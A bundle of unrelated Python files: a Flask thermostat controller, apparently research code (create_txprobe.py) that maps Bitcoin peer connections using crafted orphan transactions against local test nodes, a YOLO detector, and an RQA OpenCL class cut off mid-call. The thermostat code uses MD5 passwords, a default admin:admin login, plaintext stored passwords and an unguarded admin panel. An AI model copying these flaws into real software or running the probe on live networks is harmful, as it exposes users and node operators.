event[3] not in ('on', 'off', 'auto')):
continue
props['status_%s' % event[2]] = event[3]
if event[4].isdecimal():
props['trigger_temp'] = int(event[4])
storeobject('props', props)
def gensecret():
return ''.join(chr(random.randint(97, 122)) for i in range(64))
@app.route('/apigensalt', methods=['GET'])
def apigensecret():
user = flask.request.args['user']
api_user_salts[user] = gensecret()
return api_user_salts[user]
def validateuser():
if 'current_user' not in flask.session or not flask.session['current_user']:
return False
try:
prev_ip = flask.session['last_seen_ip']
except KeyError:
prev_ip = None
if prev_ip != flask.request.remote_addr:
return False
return True
def checkpassword(user, password_md5, secret_salt):
"""password_md5 should already be an md5 sum of the user's password,
then md5'd again with the secret key before being sent over http"""
with open('passwords.txt', 'r') as f:
passwords = dict(line.split(':') for line in f.read().split())
if password_md5 == md5((passwords[user] + secret_salt).encode('utf-8')).hexdigest():
return True
return False
@app.before_first_request
def onstart():
# Use this function to initialize modules and global vars
os.chdir('/srv/thermopi/')
logging.basicConfig(filename='history.log', level=logging.DEBUG,
format='%(asctime)s %(message)s')
props = {}
days_short = {'sunday': 'S', 'monday': 'M', 'tuesday': 'T', 'wednesday': 'W',
'thursday': 'Th', 'friday': 'F', 'saturday': 'Sa'}
storeobject('days_short', days_short)
try:
props = loadobject('props')
except FileNotFoundError:
props['status_fan'] = 'auto'
props['status_ac'] = 'off'
props['status_heat'] = 'off'
props['events'] = []
props['trigger_temp'] = 75
if not os.path.exists('settings.conf'):
shutil.copy2('sample_settings.conf', 'settings.conf')
with open('settings.conf', 'r') as settings_file:
config = json.load(settings_file)
IO.init(config)
props['units'] = config['units']
storeobject('weather_api_key', config['weather_api_key'])
storeobject('location', config['location'])
storeobject('props', props)
props['temp_inside'] = '%.1f' % IO.gettemp()
props['temp_outside'] = getoutsidetemp()
if not os.path.exists('passwords.txt'):
with open('passwords.txt', 'w') as f:
f.write('admin:%s\n' % md5(b'admin').hexdigest())
storeobject('api_user_salts', {})
storeobject('props', props)
t = threading.Thread(target=periodicrun, daemon=True)
t.start()
@app.route('/setstate', methods=['GET'])
def setstate():
api_user_salts = loadobject('api_user_salts')
if 'user' in flask.request.args:
user = flask.request.args['user']
password_md5 = flask.request.args['password_hash']
if (not user in api_user_salts or
not checkpassword(user, password_md5, api_user_salts[user])):
return '403'
# API will never see this new salt
# This is just done to get rid of the old one
api_user_salts[user] = gensecret()
else:
user = flask.session['current_user']
storeobject('api_user_salts', api_user_salts)
props = loadobject('props')
if ('status_ac' in flask.request.args and
('status_heat' not in flask.request.args or flask.request.args['status_heat'] == 'off')):
props['status_ac'] = flask.request.args['status_ac']
if ('status_heat' in flask.request.args and
('status_ac' not in flask.request.args or flask.request.args['status_ac'] == 'off')):
props['status_heat'] = flask.request.args['status_heat']
if 'status_fan' in flask.request.args:
props['status_fan'] = flask.request.args['status_fan']
if 'trigger_temp' in flask.request.args:
props['trigger_temp'] = int(flask.request.args['trigger_temp'])
logging.warning('%s set fan:%s ac:%s heat:%s temp:%s' % (user, props['status_fan'], props['status_ac'],
props['status_heat'], props['trigger_temp']))
storeobject('props', props)
return flask.redirect('/')
@app.route('/newevent', methods=['GET'])
def newevent():
validation = validateuser()
if not validation:
return flask.redirect('/')
#with open('pickledb/days_short.pickle', 'rb') as days_short_file:
# days_short = pickle.load(days_short_file)
days_short = loadobject('days_short')
f = flask.request.args.copy()
days = ''
for day in f.getlist('days_select'):
days += days_short[day]
if f['mode_select'] == 'auto':
temp = f['temp']
else:
temp = ''
if f['device_select'] == 'fan' and f['mode_select'] == 'off':
# This configuration is not possible without
# manually crafting the GET request...
return flask.redirect('/')
t = f['time']
while len(t) < 4:
t = '0' + t
props = loadobject('props')
props['events'].append([days, t, f['device_select'], f['mode_select'], temp])
# Sort by execution time
props['events'].sort(key=lambda x: x[1])
logging.warning('%s created event %s' % (flask.session['current_user'], str(props['events'][-1])))
storeobject('props', props)
return flask.redirect('/')
@app.route('/deleteevent', methods=['GET'])
def deleteevent():
validation = validateuser()
if not validation:
return flask.redirect('/')
eventIndex = int(flask.request.args['index'])
props = loadobject('props')
logging.warning('%s deleted event %s' % (flask.session['current_user'], str(props['events'][eventIndex])))
props['events'].pop(eventIndex)
storeobject('props', props)
return flask.redirect('/')
@app.route('/login', methods=['GET', 'POST'])
def login():
"""How authentification works:
Account setup: password is transferred as a plain text md5 hash
and is vulnerable to interception over http at this time
Normal login: GET request generates new 64-byte random secret which is embedded in the page js.
When a password is entered, we get the md5 hash then append the secret to this hash
and then hash it again.
Result: an attackter cannot use intercepted data to log in.
If the ip address of a user's request changes. Validation will return false
to prevent copying cookies from a local maching and moving them elsewhere"""
if 'session_salt' not in flask.session or flask.request.method == 'GET':
flask.session['session_salt'] = gensecret()
return flask.render_template('login.html', secret=flask.session['session_salt'])
user = flask.request.form['username']
password = flask.request.form['password']
with open('passwords.txt', 'r') as f:
passwords = dict(line.split(':') for line in f.read().split())
if not checkpassword(user, password, flask.session['session_salt']):
return flask.render_template('login.html', error='Invalid username or password',
secret=flask.session['session_salt'])
flask.session['session_salt'] = gensecret() #Create a new secret after succesfful login
flask.session['current_user'] = user
# Record ip of login. If this changes, preexisting login sessions will be invalidated.
#flask.session['last_seen_ip'] = flask.request.remote_addr
flask.session['last_seen_ip'] = flask.request.environ['REMOTE_ADDR']
# logging.warning('%s logged in' % user)
return flask.redirect('/')
@app.route('/logout', methods=['GET'])
def logout():
# logging.warning('%s logged out' % flask.session['current_user'])
flask.session['current_user'] = ''
return flask.redirect('/login')
@app.route('/requestuser', methods=['GET', 'POST'])
def requestuser():
if flask.request.method == 'GET':
return flask.redirect('/login')
username = flask.request.form['req_username']
password = flask.request.form['req_password_1']
with open('passwords.txt', 'r') as f:
current_users = [line.split(':')[0] for line in f.read().split()]
if username in current_users:
message = 'That user already exists!'
elif any(ord(c) > 255 for c in username):
message = 'Usernames may not contain unicode characters!'
else:
with open('user_requests.txt', 'a') as f_req:
f_req.write('%s:%s\n' % (username, password))
message = 'Request sent!'
return flask.render_template('login.html', error=message, secret=flask.session['session_salt'])
@app.route('/admin', methods=['GET'])
def adminpanel():
if 'current_user' in flask.session and flask.session['current_user'] != 'admin':
return flask.redirect('/')
with open('user_requests.txt', 'r') as f_req:
request_users = dict(line.split(':') for line in f_req.read().split())
with open('passwords.txt', 'r') as f_users:
all_users = dict(line.split(':') for line in f_users.read().split())
if flask.request.args:
if flask.request.args['action'] == 'confirm':
new_user = flask.request.args['user']
all_users[new_user] = request_users[new_user]
request_users.pop(new_user)
elif flask.request.args['action'] == 'deny':
request_users.pop(flask.request.args['user'])
elif flask.request.args['action'] == 'delete':
if flask.request.args['user'] != 'admin':
all_users.pop(flask.request.args['user'])
with open('user_requests.txt', 'w') as f_req:
for user, passwd in request_users.items():
f_req.write('%s:%s\n' % (user, passwd))
with open('passwords.txt', 'w') as f_users:
for user, passwd in all_users.items():
f_users.write('%s:%s\n' % (user, passwd))
return flask.render_template('admin.html', requests=request_users.keys(), all_users=all_users)
@app.route('/', methods=['GET'])
def rootdir():
# This is a good place to start
validation = validateuser()
if not validation:
return flask.redirect('/login')
props = loadobject('props')
page = flask.render_template('root.html', **dict(props, **flask.session))
return page
@app.route('/api', methods=['GET'])
def api():
"""Get information only. json formatted"""
return flask.render_template('api.html', **loadobject('props'))
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8056, debug=True, use_reloader=False)
|
create_txprobe.py
|
from binascii import hexlify, unhexlify
from bitcoin.core import *
from bitcoin.core.key import *
from bitcoin.core.script import *
from bitcoin.core.scripteval import *
from bitcoin import base58
from bitcoin.messages import *
import time
from cStringIO import StringIO
from test_createtx import Transaction, void_coinbase, k, txpair_from_p2sh, get_txin_second
import logger
from txtools import *
from connector import *
def do_send(sock, msg):
written = 0
while (written < len(msg)):
rv = sock.send(msg[written:], 0)
if rv > 0:
written = written + rv
if rv < 0:
raise Exception("Error on write (this happens automatically in python?)");
def get_cxns():
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)
#socket.create_connection
sock.connect("/tmp/bitcoin_control")
cmsg = command_msg(commands.COMMAND_GET_CXN, 0)
ser = cmsg.serialize()
do_send(sock, ser)
length = sock.recv(4, socket.MSG_WAITALL)
length, = unpack('>I', length)
infos = sock.recv(length, socket.MSG_WAITALL)
# Each info chunk should be 36 bytes
cur = 0
while(len(infos[cur:cur+36]) > 0):
cinfo = connection_info.deserialize(infos[cur:cur+36])
print "{0} {1}:{2} - {3}:{4}".format(cinfo.handle_id, cinfo.remote_addr, cinfo.remote_port, cinfo.local_addr, cinfo.local_port)
yield cinfo.handle_id[0]
cur = cur + 36
def create_txprobe(input1, input2, n):
"""Creates several kinds of transactions:
PARENT[i]:
spends input1
creates output p[i]
ORPHAN[i]:
spends input2, and p[i]
creates output o[i] for recovery.
FLOOD:
spends input1, blocks parent[i]
"""
PARENTS = []
ORPHANS = []
for i in range(n):
tx_parent = Transaction()
tx_parent.vin = [input1]
_tx_parent_out,tx_parent_in = txpair_from_p2sh(nValue=0.008*COIN)
tx_parent.append_txout(_tx_parent_out)
tx_parent.finalize()
PARENTS.append(tx_parent)
tx_orphan = Transaction()
tx_orphan.vin = [input2, tx_parent_in]
_tx_orphan_out,tx_orphan_in = txpair_from_p2sh(nValue=0.005*COIN)
tx_orphan.append_txout(_tx_orphan_out)
tx_orphan.finalize()
ORPHANS.append(tx_orphan)
FLOOD = Transaction()
FLOOD.vin = [input1]
_flood_out,tx_flood_in = txpair_from_p2sh(nValue=0.008*COIN)
FLOOD.append_txout(_flood_out)
FLOOD.finalize()
return PARENTS, ORPHANS, FLOOD
def make_block():
block = CBlock()
if 1:
prevhash = "00000000000000005bac7c3c745d926451483e7a15ce7a76627861f19f756d22" # Block 302980 on main chain
nBits = 409544770
height = 302981
nTime = 1401257762
ver = 2
block.hashPrevBlock = unhexlify(prevhash)[::-1]
block.vtx.append(void_coinbase(height=height))
block.nBits = nBits
block.nNonce = 9999999 # Not a valid proof of work, but this is ok
block.nTime = nTime
block.nVersion = ver;
return block
def schedule(elems):
# Rows and columns
import math
n = len(elems)
sn = int(math.ceil(math.sqrt(n)))
s = range(n)
sets = []
# Rows
for i in range(sn):
tgt = elems[i*sn:(i+1)*sn]
tst = set(elems).difference(set(tgt))
if not tgt: continue
sets.append((tgt,tst))
# Columns
for i in range(sn):
tgt = elems[i::sn]
tst = set(elems).difference(set(tgt))
sets.append((tgt,tst))
return sets
def make_experiment2(path='./experiment2_payload.dat'):
import time
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)
#socket.create_connection
sock.connect("/tmp/bitcoin_control")
# Reset all the connections
print 'Resetting connections'
n = 79
cmsg = command_msg(commands.COMMAND_DISCONNECT, 0, [targets.BROADCAST])
ser = cmsg.serialize()
do_send(sock, ser)
for i in range(1,n+1):
msg = connect_msg('127.0.0.1', 8332+i, '0.0.0.0', 0)
ser = msg.serialize()
do_send(sock, ser)
print 'Connecting'
time.sleep(2)
nodes = list(get_cxns())
print 'Nodes:', nodes
import math
sn = int(math.ceil(math.sqrt(n)))
sched = schedule(range(n))
print 'sqrt(n):', sn
print 'schedule:', len(sched)
# 1. Create a setup transaction with enough inputs for 2 boosters per trial
tx_setup = Transaction()
tx_setup.vin = [get_txin_second()]
tx_setup_ins = []
for _ in sched:
for _ in range(2):
_out,_in = txpair_from_p2sh(nValue=0.01*COIN)
tx_setup.append_txout(_out)
tx_setup_ins.append(_in)
tx_setup.finalize()
# 1a. Add tx_setup to a block
block = make_block()
block.vtx.append(tx_setup._ctx)
block.hashMerkleRoot = block.calc_merkle_root()
PAYLOADS = []
for i,(tgt,tst) in enumerate(sched):
PARENTS, ORPHANS, FLOOD = create_txprobe(tx_setup_ins[2*i+0], tx_setup_ins[2*i+1], len(tgt))
PAYLOADS.append((PARENTS, ORPHANS, FLOOD))
return nodes, block, PAYLOADS
def check_logs(nodes, PARENTS, ORPHANS, FLOOD, logs):
orphan_hashes = [Hash(o._ctx.serialize()) for o in ORPHANS]
d = dict(zip(orphan_hashes, nodes))
edges = set()
for log in logs:
if log.is_sender: continue
msg = MsgSerializable.stream_deserialize(StringIO('\xf9'+log.bitcoin_msg))
if msg.command != 'getdata': continue
print log.handle_id
connected = set(nodes)
connected.remove(log.handle_id) # Remove self
for i in msg.inv:
connected.remove(d[i.hash])
for i in connected:
edges.add(tuple(sorted((log.handle_id-min(nodes)+1,i-min(nodes)+1))))
for i,j in sorted(edges):
print i, '<->', j
yield i,j
def check_all_logs(nodes, PAYLOADS, logs):
sched = schedule(nodes)
edges = set()
# First determine the edges to pay attention to
d = {}
expected = dict((n,[]) for n in nodes)
assert(len(PAYLOADS) == len(sched))
for (tgt,tst),(PARENTS,ORPHANS,_) in zip(sched,PAYLOADS):
orphan_hashes = [Hash(o._ctx.serialize()) for o in ORPHANS]
assert(len(orphan_hashes) == len(tgt))
d.update(dict(zip(orphan_hashes, tgt)))
for n in tst: expected[n] += orphan_hashes
for n in nodes: expected[n] = set(expected[n])
actual = dict((n,[]) for n in nodes)
for log in logs:
if log.is_sender: continue
msg = MsgSerializable.stream_deserialize(StringIO('\xf9'+log.bitcoin_msg))
if msg.command != 'getdata': continue
for i in msg.inv:
if i.hash in expected[log.handle_id]:
actual[log.handle_id].append(i.hash)
for n in nodes: actual[n] = set(actual[n])
for i in nodes:
for h in expected[i]:
j = d[h]
if h not in actual[i]:
edges.add(tuple(sorted((j-min(nodes)+1,i-min(nodes)+1))))
for i,j in sorted(edges):
print i, '<->', j
yield i,j
def run_experiment2(nodes, block, PAYLOADS):
import time
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)
#socket.create_connection
sock.connect("/tmp/bitcoin_control")
# Set up a sending thread and queue
from threading import Lock, Thread
lock = Lock()
# Helper functions
def register_block(blk):
m = msg_block()
m.block = blk
cmsg = bitcoin_msg(m.serialize())
ser = cmsg.serialize()
lock.acquire()
do_send(sock, ser)
rid = sock.recv(4)
lock.release()
rid, = unpack('>I', rid) # message is now saved and can be sent to users with this id
return rid
def register_tx(tx):
m = msg_tx()
m.tx = tx._ctx
cmsg = bitcoin_msg(m.serialize())
ser = cmsg.serialize()
lock.acquire()
do_send(sock, ser)
rid = sock.recv(4)
lock.release()
rid, = unpack('>I', rid) # message is now saved and can be sent to users with this id
return rid
def register_inv(txs):
m = msg_inv()
for tx in txs:
inv = CInv()
inv.type = 1 # TX
inv.hash = Hash(tx._ctx.serialize())
m.inv.append(inv)
cmsg = bitcoin_msg(m.serialize())
ser = cmsg.serialize()
lock.acquire()
do_send(sock, ser)
rid = sock.recv(4)
lock.release()
rid, = unpack('>I', rid) # message is now saved and can be sent to users with this id
return rid
def broadcast(rid):
cmsg = command_msg(commands.COMMAND_SEND_MSG, rid, (targets.BROADCAST,))
ser = cmsg.serialize()
lock.acquire()
do_send(sock, ser)
lock.release()
def send_to_nodes(rid, nodes):
cmsg = command_msg(commands.COMMAND_SEND_MSG, rid, nodes)
ser = cmsg.serialize()
lock.acquire()
do_send(sock, ser)
lock.release()
# Run the experiment!
print 'Setup'
broadcast(register_block(block))
sched = schedule(nodes)
global logs, all_logs
all_logs = []
print 'Reading'
logsock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)
logsock.connect("/tmp/logger/clients/bitcoin_msg")
for (target_set, test_set), (PARENTS, ORPHANS, FLOOD) in zip(sched, PAYLOADS):
def g((target_set, test_set), (PARENTS, ORPHANS, FLOOD)):
print "Targets:", target_set
print 'Step 1: inv locking'
broadcast(register_inv(PARENTS + [FLOOD]))
time.sleep(1)
print 'Step 2: send the flood'
send_to_nodes(register_tx(FLOOD), test_set)
print 'Step 3: prime the orphans'
for n,orphan in zip(target_set,ORPHANS):
send_to_nodes(register_tx(orphan), (n,))
time.sleep(3) # Make sure the flood propagates
print 'Step 4: send parents'
for n,parent in zip(target_set,PARENTS):
send_to_nodes(register_tx(parent), (n,))
time.sleep(10)
print 'Step 5: read back'
send_to_nodes(register_inv(ORPHANS), test_set)
Thread(target=g,args=((target_set, test_set), (PARENTS, ORPHANS, FLOOD))).start()
#g()
logs = []
deadline = time.time() + 20
def _read_logs():
while(True):
logsock.settimeout(deadline - time.time())
try:
length = logsock.recv(4, socket.MSG_WAITALL);
length, = unpack('>I', length)
logsock.settimeout(deadline - time.time())
record = logsock.recv(length, socket.MSG_WAITALL)
except socket.timeout: break
log_type, timestamp, rest = logger.log.deserialize_parts(record)
log = logger.type_to_obj[log_type].deserialize(timestamp, rest)
logs.append(log)
logsock.settimeout(None)
print 'Done'
t = Thread(target=_read_logs)
t.start()
t.join()
|
process.py
|
import cv2 as cv
import numpy as np
from threading import Thread
from frame_queue import FrameQueue
import queue
import time
import os
import sys
from utils import file_path
class ImageProcessor:
'''Process images with the OpenCV DNN YOLO implementation.
Images and predictions are stored in parallel queues.'''
def __init__(self, ImageProvider, Config):
self.ImageProvider = ImageProvider
self.processedQueue = FrameQueue()
self.predictionQueue = queue.Queue()
self.processing = False
self.config = Config
self.classes = self.load_classes()
self.processThread = Thread(target=self.processThreadBody, daemon=True)
self.processThread.start()
self.draw = False
def load_classes(self):
'''Load YOLO model class file'''
classes_path = self.config.get_property('classes_path')
if classes_path is None:
raise KeyError('Configuration property "classes_path" not \
configured')
try:
f = open(file_path(classes_path), "rt")
classes = f.read().rstrip('\n').split('\n')
f.close()
return classes
except FileNotFoundError as e:
print('Class file not found')
exit(1)
def get_classes(self):
'''Returns the ordered list of classes'''
return self.classes
def start_processing(self, dt=0):
'''Start processing images through the neural network'''
self.processedQueue.queue.clear()
self.predictionQueue.queue.clear()
self.processing = True
def stop_processing(self):
'''Stop processing images through the neural network'''
self.processing = False
def start_drawing(self):
'''Start drawing circles on processed frames around detected objects'''
self.draw = True
def stop_drawing(self):
'''Stop drawing circles'''
self.draw = False
def is_processing(self):
'''Returns True if images are currently being passed through the network'''
return self.processing
def get_frame(self):
'''Get the next processed frame from the queue
Returns:
A tuple where the first item is True if a frame exists in the
queue. If the frame queue is empty then the first value will be
False. The second item will either be image data or None depending
on if an image was availible.
'''
try:
return (True, self.processedQueue.get_nowait())
except queue.Empty:
return (False, None)
def get_frame_predictions(self):
'''Get YOLO object detections from the prediction queue
Returns:
A tuple where the first item is True if a frame prediction exists in the
queue. The second item is either None (if no predictions are availible),
or a list of directories. Each dictonary is one object detection and
contains the following data:
x: box center pixel along image x-axis,
y: box center pixel along image y-axis,
width: box width in pixels,
height: box height in pixels,
class: 'Rock', 'Paper', or 'Scissors',
confidence: Percentage confidence value
'''
try:
return (True, self.predictionQueue.get_nowait())
except queue.Empty:
return (False, None)
def processThreadBody(self):
'''Thread body which handles YOLO processing'''
# These values could be updated after the thread starts
# Get configuration values
weights_path = file_path(self.config.get_property('weights_path'))
cfg_path = file_path(self.config.get_property('cfg_path'))
inpWidth = self.config.get_property('inpWidth')
inpHeight = self.config.get_property('inpHeight')
scale = self.config.get_property('scale')
mean = self.config.get_property('mean')
confThreshold = self.config.get_property('confThreshold')
nmsThreshold = self.config.get_property('nmsThreshold')
circle_scale = self.config.get_property('circle_scale')
# Iniitialize the OpenCV darknet DNN module
net = cv.dnn.readNet(weights_path, cfg_path, 'darknet')
outNames = net.getUnconnectedOutLayersNames()
frameWidth, frameHeight = self.ImageProvider.get_dimensions()
while True:
if not self.processing:
time.sleep(0.1)
else:
ret, frame = self.ImageProvider.get_frame()
if ret:
self.ImageProvider.clear_frames()
framePredictions = list()
blob = cv.dnn.blobFromImage(frame,
size=(inpWidth, inpHeight),
swapRB=False, ddepth=cv.CV_8U)
net.setInput(blob, scalefactor=scale, mean=mean)
outs = net.forward(outNames)
boxes = []
confidences = []
classIDs = []
for out in outs:
for detection in out:
scores = detection[5:8]
classId = np.argmax(scores)
confidence = scores[classId]
if confidence > confThreshold:
center_x = int(detection[0] * frameWidth)
center_y = int(detection[1] * frameHeight)
width = int(detection[2] * frameWidth)
height = int(detection[3] * frameHeight)
left = int(center_x - width / 2)
top = int(center_y - height / 2)
classIDs.append(classId)
confidences.append(float(confidence))
boxes.append([left, top, width, height])
indices = cv.dnn.NMSBoxes(boxes, confidences,
confThreshold, nmsThreshold)
for i in indices:
i = i[0]
box = boxes[i]
left = box[0]
top = box[1]
width = box[2]
height = box[3]
center_x = int(left+(width/2))
center_y = int(top+(height/2))
object = self.classes[classIDs[i]]
if self.draw:
if object == "Rock":
color = (255, 0, 0)
elif object == "Paper":
color = (0, 255, 0)
elif object == "Scissors":
color = (0, 0, 255)
cv.rectangle(frame, (center_x-int(width/2), center_y+int(height/2)), (center_x+int(width/2), center_y-int(height/2)), color)
prediction = {
'x': center_x,
'y': center_y,
'width': width,
'height': height,
'class': object,
'confidence': confidences[i]
}
framePredictions.append(prediction)
self.processedQueue.put(frame)
self.predictionQueue.put(framePredictions)
|
row_mat_byte_rec.py
|
#!/usr/bin/python
#
# This file is part of PyRQA.
# Copyright 2015 Tobias Rawald, Mike Sips.
"""
RQA, Fixed Radius, OpenCL, RowMatByteRec
"""
import numpy as np
import os
import pyopencl as cl
import threading
import Queue
from ....abstract_classes import AbstractRunnable
from ....opencl import OpenCL
from ....processing_order import Diagonal
from ....recurrence_analysis import RQASubMatricesCarryover
from ....result import RQAResult
from ....runtimes import Runtimes
class RowMatByteRec(RQASubMatricesCarryover, AbstractRunnable):
"""
Input Data Representation: Row-Store
Similarity Value Materialisation: Yes
Similarity Value Representation: Byte
Intermediate Results Recycling: Yes
"""
def __init__(self,
settings,
opencl=None,
verbose=False,
command_line=False,
edge_length=10240,
processing_order=Diagonal,
optimisations_enabled=False,
data_type=np.uint8):
RQASubMatricesCarryover.__init__(self, settings, verbose, edge_length, processing_order)
self.opencl = opencl
self.command_line = command_line
self.optimisations_enabled = optimisations_enabled
self.data_type = data_type
self.__initialise()
def __initialise(self):
self.validate_opencl()
self.threads_runtimes = {}
self.threads_diagonal_frequency_distribution = {}
self.threads_vertical_frequency_distribution = {}
self.threads_white_vertical_frequency_distribution = {}
for device in self.opencl.devices:
self.threads_runtimes[device] = Runtimes()
self.threads_diagonal_frequency_distribution[device] = self.get_emtpy_global_frequency_distribution()
self.threads_vertical_frequency_distribution[device] = self.get_emtpy_global_frequency_distribution()
self.threads_white_vertical_frequency_distribution[device] = self.get_emtpy_global_frequency_distribution()
def reset(self):
RQASubMatricesCarryover.reset(self)
self.__initialise()
def validate_opencl(self):
if not self.opencl:
self.opencl = OpenCL(verbose=self.verbose,
command_line=self.command_line,
optimisations_enabled=self.optimisations_enabled)
if not self.opencl.programs_created:
self.opencl.create_programs(kernel_file_names=self.settings.get_kernel_file_names(self),
similarity_measure_name=self.settings.similarity_measure.name,
leaf_path=os.path.dirname(os.path.abspath(__file__)),
root_path=self.settings.base_path)
def process_sub_matrix(self, *args, **kwargs):
device = kwargs['device']
sub_matrix_queue = kwargs['sub_matrix_queue']
context = self.opencl.contexts[device]
command_queue = self.opencl.command_queues[device]
program = self.opencl.programs[device]
vertical_kernel = cl.Kernel(program, 'vertical')
diagonal_kernel = cl.Kernel(program, self.settings.diagonal_kernel_name)
while True:
try:
sub_matrix = sub_matrix_queue.get(False)
transfer_from_device_events = []
transfer_to_device_events = []
create_matrix_events = []
vertical_events = []
diagonal_events = []
# Vectors X
vectors_x = self.get_vectors_x(sub_matrix)
vectors_x_buffer = cl.Buffer(context,
cl.mem_flags.READ_ONLY,
vectors_x.size * vectors_x.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
vectors_x_buffer,
vectors_x,
device_offset=0,
wait_for=None,
is_blocking=False))
# Vectors Y
vectors_y = self.get_vectors_y(sub_matrix)
vectors_y_buffer = cl.Buffer(context,
cl.mem_flags.READ_ONLY,
vectors_y.size * vectors_y.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
vectors_y_buffer,
vectors_y,
device_offset=0,
wait_for=None,
is_blocking=False))
# Recurrence matrix
# matrix = self.get_matrix(sub_matrix)
# matrix_buffer = cl.Buffer(context, cl.mem_flags.READ_WRITE, matrix.size * matrix.itemsize)
# transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue, matrix_buffer, matrix, device_offset=0, wait_for=None, is_blocking=False))
matrix = np.zeros(1,
dtype=self.data_type)
matrix_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
int(self.get_recurrence_matrix_size(sub_matrix, self.data_type)))
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
matrix_buffer,
matrix,
device_offset=0,
wait_for=None,
is_blocking=False))
# Recurrence points
recurrence_points, \
recurrence_points_start, \
recurrence_points_end = self.get_recurrence_points(sub_matrix)
recurrence_points_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
recurrence_points.size * recurrence_points.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
recurrence_points_buffer,
recurrence_points,
device_offset=0,
wait_for=None,
is_blocking=False))
# Vertical frequency distribution
vertical_frequency_distribution = self.get_empty_local_frequency_distribution()
vertical_frequency_distribution_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
vertical_frequency_distribution.size * vertical_frequency_distribution.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
vertical_frequency_distribution_buffer,
vertical_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
# White vertical frequency distribution
white_vertical_frequency_distribution = self.get_empty_local_frequency_distribution()
white_vertical_frequency_distribution_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
white_vertical_frequency_distribution.size * white_vertical_frequency_distribution.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
white_vertical_frequency_distribution_buffer,
white_vertical_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
# Diagonal frequency distribution
diagonal_frequency_distribution = self.get_empty_local_frequency_distribution()
diagonal_frequency_distribution_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
diagonal_frequency_distribution.size * diagonal_frequency_distribution.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
diagonal_frequency_distribution_buffer,
diagonal_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
# Vertical carryover
vertical_carryover, \
vertical_carryover_start,\
vertical_carryover_end = self.get_vertical_length_carryover(sub_matrix)
vertical_carryover_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
vertical_carryover.size * vertical_carryover.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
vertical_carryover_buffer,
vertical_carryover,
device_offset=0,
wait_for=None,
is_blocking=False))
# White vertical carryover
white_vertical_carryover, \
white_vertical_carryover_start,\
white_vertical_carryover_end = self.get_white_vertical_length_carryover(sub_matrix)
white_vertical_carryover_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
white_vertical_carryover.size * white_vertical_carryover.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
white_vertical_carryover_buffer,
white_vertical_carryover,
device_offset=0,
wait_for=None,
is_blocking=False))
# Diagonal carryover
diagonal_carryover, \
diagonal_carryover_start, \
diagonal_carryover_end = self.get_diagonal_length_carryover(sub_matrix)
diagonal_carryover_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
diagonal_carryover.size * diagonal_carryover.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
diagonal_carryover_buffer,
diagonal_carryover,
device_offset=0,
wait_for=None,
is_blocking=False))
command_queue.finish()
# Vertical kernel
vertical_args = [vectors_x_buffer,
vectors_y_buffer,
np.uint32(sub_matrix.dim_x),
np.uint32(sub_matrix.dim_y),
np.uint32(self.settings.embedding_dimension),
np.uint32(self.settings.time_delay),
np.float32(self.settings.neighbourhood.radius),
recurrence_points_buffer,
vertical_frequency_distribution_buffer,
vertical_carryover_buffer,
white_vertical_frequency_distribution_buffer,
white_vertical_carryover_buffer,
matrix_buffer]
OpenCL.set_kernel_args(vertical_kernel,
vertical_args)
global_work_size = [int(sub_matrix.dim_x + (device.max_work_group_size - (sub_matrix.dim_x % device.max_work_group_size)))]
local_work_size = None
vertical_events.append(cl.enqueue_nd_range_kernel(command_queue,
vertical_kernel,
global_work_size,
local_work_size))
command_queue.finish()
# Diagonal kernel
if self.settings.is_matrix_symmetric:
diagonal_args = [matrix_buffer,
np.uint32(sub_matrix.dim_x),
np.uint32(sub_matrix.dim_y),
np.uint32(sub_matrix.start_x),
np.uint32(sub_matrix.start_y),
np.uint32(self.settings.theiler_corrector),
np.uint32(self.get_diagonal_offset(sub_matrix)),
diagonal_frequency_distribution_buffer,
diagonal_carryover_buffer]
global_work_size = [int(sub_matrix.dim_x + (device.max_work_group_size - (sub_matrix.dim_x % device.max_work_group_size)))]
else:
diagonal_args = [matrix_buffer,
np.uint32(sub_matrix.dim_x),
np.uint32(sub_matrix.dim_y),
np.uint32(sub_matrix.dim_x + sub_matrix.dim_y - 1),
np.uint32(sub_matrix.start_x),
np.uint32(sub_matrix.start_y),
np.uint32(self.settings.theiler_corrector),
diagonal_frequency_distribution_buffer,
diagonal_carryover_buffer]
global_work_size_x = sub_matrix.dim_x + sub_matrix.dim_y - 1
global_work_size = [int(global_work_size_x + (device.max_work_group_size - (global_work_size_x % device.max_work_group_size)))]
OpenCL.set_kernel_args(diagonal_kernel,
diagonal_args)
local_work_size = None
diagonal_events.append(cl.enqueue_nd_range_kernel(command_queue,
diagonal_kernel,
global_work_size,
local_work_size))
command_queue.finish()
# Read buffer
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
recurrence_points_buffer,
self.recurrence_points[recurrence_points_start:recurrence_points_end],
device_offset=0,
wait_for=None,
is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
vertical_frequency_distribution_buffer,
